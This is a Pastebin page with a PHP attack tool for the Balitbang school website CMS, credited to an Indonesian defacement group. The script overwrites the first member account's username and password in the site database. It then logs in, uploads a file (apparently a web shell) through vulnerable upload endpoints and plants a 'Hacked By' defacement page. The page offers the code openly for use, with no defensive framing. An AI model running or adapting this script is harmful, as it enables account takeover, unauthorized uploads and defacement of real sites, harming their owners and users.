API tools faq
paste
Advertisement
Tu5b0l3d

Auto edit user and deface in balitbang

Tu5b0l3d
Oct 13th, 2015
1,343
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 5.79 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. //Tu5b0l3d
  3.  
  4. //thx to: IndoXploit, Hacker-Newbie.org
  5. //http://indoxploit.blogspot.co.id/2015/10/auto-edit-user-and-deface-in-balitbang.html
  6.  
  7.  
  8.  
  9.     if($_POST['submitt']){
  10.  
  11.  
  12.         $host = $_POST['host'];
  13.  
  14.         $username = $_POST['username'];
  15.  
  16.         $password = $_POST['password'];
  17.  
  18.         $db = $_POST['db'];
  19.  
  20.         $user_baru = $_POST['user_baru'];
  21.  
  22.         $password_baru = $_POST['password_baru'];
  23.  
  24.         $tanya = $_POST['tanya'];
  25.  
  26.         $target = $_POST['target'];
  27.  
  28.         $nick = $_POST['nick'];
  29.  
  30.         $prefix = $db.".t_member";
  31.  
  32.         $pass = md5("$password_baru");
  33.  
  34.  
  35.         mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
  36.  
  37.         mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
  38.  
  39.  $tampil=mysql_query("SELECT * FROM $prefix ORDER BY userid ASC");
  40.     $r=mysql_fetch_array($tampil);
  41.         $id = $r[userid];
  42.        
  43.  
  44.          mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE userid='$id'");
  45.  
  46.        
  47.        
  48.            
  49.            
  50.             if ($tanya == "y"){
  51.  
  52.            
  53.                     $ch5 = curl_init("$target/member/ajax_login.php");
  54.                 curl_setopt($ch5, CURLOPT_RETURNTRANSFER, 1);
  55.                 curl_setopt($ch5, CURLOPT_POST, 1);
  56.                 curl_setopt($ch5, CURLOPT_POSTFIELDS, "user_name=$user_baru&password=$password_baru");
  57.                 curl_setopt($ch5, CURLOPT_COOKIEJAR,'coker_log');
  58.                 curl_setopt($ch5, CURLOPT_COOKIEFILE,'coker_log');
  59.                 $exec11 = curl_exec($ch5);
  60.              
  61.                
  62.            
  63.               if(preg_match("#yes#si",$exec11)){
  64.                     echo "Username : $user_baru<br>";
  65.                     echo "Password : $password_baru<br>";
  66.  
  67.                     $uploadfile="ganteng4.php";
  68.                         $ch = curl_init("$target/functions/simmateriguru.php");
  69.                         curl_setopt($ch, CURLOPT_POST, true);
  70.                         curl_setopt($ch, CURLOPT_POSTFIELDS,
  71.                         array('file'=>"@$uploadfile"));
  72.                         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  73.                         curl_setopt($ch, CURLOPT_COOKIEFILE, "coker_log");
  74.                         $postResult = curl_exec($ch);
  75.  
  76. $namafile = "wew.php";
  77. $fp2 = fopen($namafile,"w");
  78. fputs($fp2,$nick);
  79.  
  80.                    
  81.                         $ch6 = curl_init("$target/materi/file.php");
  82.                         curl_setopt($ch6, CURLOPT_POST, true);
  83.                         curl_setopt($ch6, CURLOPT_POSTFIELDS,
  84.                         array('file3'=>"@$namafile"));
  85.                         curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  86.                         curl_setopt($ch6, CURLOPT_COOKIEFILE, "coker_log");
  87.                         $postResult = curl_exec($ch6);
  88.                         curl_close($ch6);
  89.  
  90.                            $ch5 = "$target/k.php";
  91.             $file2 = @file_get_contents($ch5);
  92.        
  93.             if(preg_match("#hacked#si",$file2)){
  94.                         echo "<font color='green'>berhasil mepes...</font><br>";
  95.                         echo "$target/k.php<br>";
  96.                     }
  97.                     else{
  98.                         echo "<font color='red'>gagal mepes...</font><br>";
  99.                         echo "coba aja manual: <br>";
  100.                         echo "$target/member<br>";
  101.                         echo "username: $user_baru<br>";
  102.                         echo "password: $password_baru<br>";
  103.  
  104.                        
  105.                     }
  106.                 }
  107.                 else{
  108.                     echo "Username dan Password tidak Berhasil Dibuat :p<br>";
  109.                 }
  110.  
  111.  
  112.                
  113.  
  114.             }
  115.             elseif($tanya == "n"){
  116.             echo "Sukses<br>";
  117.             echo "username: $user_baru<br>";
  118.             echo "password: $password_baru<br>";
  119.  
  120.             }
  121.        
  122.  
  123.         }
  124.  
  125.  
  126.  
  127.         else{
  128.  
  129.             echo '<html>
  130.  
  131.    <head>
  132.  
  133.        <title>Edit user in Balitbang</title>
  134.  
  135.    </head>
  136.  
  137.  
  138.  
  139.    <body>
  140.  
  141.            <center>
  142.  
  143.                <center
  144.  
  145.                        <h2>Edit user in Balitbang</h2>
  146.  
  147.                        <table>
  148.  
  149.                            <tr><td><form method="post" action="?action"></td></tr>
  150.  
  151.                            <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
  152.  
  153.                            <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
  154.  
  155.                            <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
  156.  
  157.                            <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
  158.  
  159.                          
  160.                            <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
  161.  
  162.                            <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
  163.                            <tr><td></td></tr>
  164.                            <tr><td></td></tr>
  165.                          
  166.  
  167.                            <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
  168.                             <tr><td><input type="text" name="target" placeholder="www.IndoXploit.org"></td></tr>
  169.  
  170.                              <tr><td><input type="text" name="nick" placeholder="Hacked By Tu5b0l3d"></td></tr>
  171.  
  172.                            <tr><td><input type="submit" value="Submit" name="submitt"></td></tr>
  173.  
  174.                        </table>
  175.                        *nb: kalo milih y ... silahkan masukin nama sitenya, kalo ngk tau nama sitenya, pilih n
  176.  
  177.            </center>
  178.  
  179.    </body>';
  180.  
  181.         }
  182.  
  183.  
  184.  
  185. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!